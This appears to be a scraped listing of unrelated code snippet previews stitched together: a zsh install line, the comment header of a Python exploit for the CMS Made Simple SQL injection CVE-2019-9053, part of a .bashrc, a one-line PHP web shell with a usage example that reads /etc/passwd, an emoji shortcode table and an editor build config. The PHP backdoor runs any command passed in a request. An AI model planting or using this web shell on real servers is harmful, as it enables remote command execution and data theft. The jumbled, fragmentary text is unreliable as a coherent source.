sudo apt install zsh-autosuggestions zsh-syntax-highlighting zsh
#!/usr/bin/python3 | |
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9 | |
# Date: 30-03-2019 | |
# Exploit Author: Daniele Scanu @ Certimeter Group | |
# Vendor Homepage: https://www.cmsmadesimple.org/ | |
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ | |
# Version: <= 2.2.9 | |
# Tested on: Ubuntu 18.04 LTS | |
# CVE : CVE-2019-9053 | |
# Updated by Krishna Upadhyay for Python 3 |
# ~/.bashrc: executed by bash(1) for non-login shells. | |
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc) | |
# for examples | |
# If not running interactively, don't do anything | |
[ -z "$PS1" ] && return | |
# don't put duplicate lines in the history. See bash(1) for more options | |
# ... or force ignoredups and ignorespace | |
HISTCONTROL=ignoredups:ignorespace |
<!-- Simple PHP Backdoor By DK (One-Liner Version) --> | |
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> | |
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> |
People
![]() :bowtie: |
😄 :smile: |
😆 :laughing: |
---|---|---|
😊 :blush: |
😃 :smiley: |
:relaxed: |
😏 :smirk: |
😍 :heart_eyes: |
😘 :kissing_heart: |
😚 :kissing_closed_eyes: |
😳 :flushed: |
😌 :relieved: |
😆 :satisfied: |
😁 :grin: |
😉 :wink: |
😜 :stuck_out_tongue_winking_eye: |
😝 :stuck_out_tongue_closed_eyes: |
😀 :grinning: |
😗 :kissing: |
😙 :kissing_smiling_eyes: |
😛 :stuck_out_tongue: |
{ | |
"cmd": ["bash $file"], | |
"shell": true, | |
"selector": "source.shell" | |
} |